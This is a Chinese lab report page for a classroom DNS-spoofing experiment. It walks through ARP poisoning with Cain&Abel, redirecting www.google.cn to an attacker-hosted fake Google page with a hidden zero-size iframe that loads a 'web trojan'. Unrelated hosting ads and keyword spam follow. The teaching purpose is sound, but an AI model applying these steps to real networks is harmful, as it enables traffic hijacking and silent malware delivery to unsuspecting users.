如图【最新资料】DNS欺骗实验报告4-1

dns欺骗  时间:2021-03-16  阅读:()

实验5 DNS欺骗

实验任务一

1安装Cain&Abel

下载并运行"Cain&Abel v4.9.26"安装程序安装完毕后会弹出一个安装提示对话框要求安装WinPcap v4.0.2如图8-51所示。如果前面已经安装过就可以单击【Don't install】按钮取消WinP c ap的安装。

2制作假Google网页

用IE浏览器打开Google主页选择菜单栏中的【菜单】→【另存为】命令。在弹出的"另存为"对话框中指定保存路径设置"保存类型"为"网页全部"如图8-52所示。单击【确定】按钮保存生成名为"goog le.htm"的网页及相关图片文件夹"Goog le.files"。

用记事本打开"google.htm"文件并进行编辑在"<SCRIPT defer><!--//--></SCRIPT>"字符串前输入如下命令见图8-53 

1. <iframe src="http://192.168.1.198/index.htm" width=0 height=0></iframe>

上面的IP应该是192.168.1.8

然后保存网页的修改。

将"google.htm"和"Google.files"复制到刚才的"C:\web"文件夹中。运行"紫雨轩ASP Web服务器"将"缺省文件"设置为"goog le.htm"单击【保存】按钮完成设置。

在浏览器中输入本机的IP地址按【Enter】键后即可打开假Google网页并且网页中嵌入了网页木马如图8-54所示。

对于这种内嵌网页木马的方式杀毒软件不会给出警告但是我们可以从"紫雨轩ASPWeb服务器"的运行记录中看到木马实际上已经被执行了如图8-55所示。

3选择欺骗攻击目标

运行Cain&Abel v4.9.26单击工具栏上的【Start/Stop ARP】按钮如图8-56所示弹出设置对话框。

内网中的DNS欺骗强大的欺骗工具Cain 2

在其中选择自己用来嗅探的网卡需要选择能正确显示IP地址的网卡如图8-57所示。单击【确定】按钮后关闭对话框单击工具栏中的【Start/Stop Sniff】按钮再选择下方的"Sniffer"选项卡如图8-58所示。

单击工具栏中的【Add to List】按钮弹出"MAC Address Scanner"对话框如图8-59所示选择"All hosts in my subnet 本机所在子网中的所有主机 "单选按钮单击【确定】按钮后程序将自动扫描局域网中的所有在线主机。扫描结束后程序窗口列表中显示出扫描结果如图8-60所示。

选择"Sniffer"选项卡中窗口列表下方的"ARP"小选项卡切换到"ARP"页面。选择左侧目录树中的顶层"ARP"选项在右边的窗格列表空白处单击鼠标左键工具栏上的【Add toLis t】按钮被激活如图8-61所示。

单击【Add to list】按钮弹出"New ARP Poison Routing"对话框在对话框左边的列表中显示当前局域网中的IP地址。在列表中选择要进行欺骗的IP地址这里假设要欺骗的IP地址为"192.168.1.9"在右边选择被欺骗IP的目标网关如图8-62所示最后单击【确定】按钮关闭对话框在窗口列表中可以看到添加的欺骗主机如图8-63所示。

4DNS欺骗攻击

在"Sniffer"选项卡的"ARP"页面中选择左侧目录树中的"ARP-DNS"选项如图8-64所示在右边的窗格列表空白处单击鼠标左键激活工具栏上的【Add to List】按钮。

单击【Add to List】按钮弹出"DNS Spoofer for APR"对话框。在"DNS Name Requested请求DNS域名"文本框中输入要正常访问的网站这里为Goog le的网页"www.google.cn"然后在"IP adress to rewrite in response packets 改写响应数据包的IP地址 "文本框中输入本机的IP"192.168.1.8"如图8-65所示。

设置完成后单击【O K】按钮DNS欺骗将被添加到程序窗口列表中如图8-66所示。

经过设置后当被欺骗的主机访问Google的网页"http://w ww.go ogle.c n"时将会被Cain&Abel工具进行数据包捕获修改将其域名解析到攻击者指定的IP地址"192.168.1.8"的网页服务。用同样的方法添加局域网中的其他任意主机到攻击目标中并设置其欺骗域名与IP地址。

设置完毕后单击【Start/Stop ARP】按钮 DNS欺骗工作就开始了。此时指定的IP地址在访问"http://www.google.c n"时就会自动跳转到攻击者刚刚建立的假Google页面上。实验任务二、使用ARP防火墙

任务简要写出实验一的核心原理并截图(需要CAIN的设置图863及866)

需要说明各个计算机所扮演的角色以及数据流向各个计算机需要安装什么服务或者什么软件。

Cloudxtiny:£1.5/月,KVM-512MB/100GB/英国机房

Cloudxtiny是一家来自英国的主机商,提供VPS和独立服务器租用,在英国肯特自营数据中心,自己的硬件和网络(AS207059)。商家VPS主机基于KVM架构,开设在英国肯特机房,为了庆祝2021年欧洲杯决赛英格兰对意大利,商家为全场VPS主机提供50%的折扣直到7月31日,优惠后最低套餐每月1.5英镑起。我们对这场比赛有点偏见,但希望这是一场史诗般的决赛!下面列出几款主机套餐配置信息。CPU...

香港E3 16G 390元/ 香港E5*2 32G 600元/ 香港站群 4-8C 1200元/ 美国200G高防 900/ 日本100M 700元

3C云国内IDC/ISP资质齐全商家,与香港公司联合运营, 已超6年运营 。本次为大家带来的是双12特惠活动,香港美国日本韩国|高速精品|高防|站群|大带宽等产品齐全,欢迎咨询问价。3C云科技有限公司官方网站:http://www.3cccy.com/客服QQ:937695003网页客服:点击咨询客户QQ交流群:1042709810价目表总览升级内存 60元 8G内存升级硬盘 1T机械 90元 2...

Spinservers:美国独立服务器(圣何塞),$111/月

spinservers是Majestic Hosting Solutions,LLC旗下站点,主营美国独立服务器租用和Hybrid Dedicated等,spinservers这次提供的大硬盘、大内存服务器很多人很喜欢。TheServerStore自1994年以来,它是一家成熟的企业 IT 设备供应商,专门从事二手服务器和工作站业务,在德克萨斯州拥有40,000 平方英尺的仓库,库存中始终有数千台...

dns欺骗为你推荐
太空国家在载人航天领域排名前三的国家是什么?杨紫别祝我生日快乐祝自己生日快乐内涵丰富的话同ip网站查询我的两个网站在同一个IP下,没被百度收录,用同IP站点查询工具查询时也找不到我的网站,是何原因?同ip网站查询服务器禁PING 是不是就可以解决同IP网站查询问题www.4411b.com难道那www真的4411B坏了,还是4411b梗换com鑫域明了rawtools佳能单反照相机的RAW、5.0M 是什么意思?同一ip网站最近我们网站老是出现同一个IP无数次的进我们网站,而且是在同一时刻,是不是被人刷了?为什么呀?porntimesexy time 本兮 MP3地址www.idanmu.com腾讯有qqsk.zik.mu这个网站吗?hao.rising.cn瑞星强制篡改主页 HTTP://HAO.RISING.CN 各位有什么办法可以解决吗?
net主机 樊云 空间打开慢 好看的桌面背景图片 tk域名 租空间 电子邮件服务器 谁的qq空间最好看 91vps 免费私人服务器 512mb 域名与空间 论坛主机 登陆qq空间 江苏双线 好看的空间 亿库 hosting24 百度新闻源申请 ipower 更多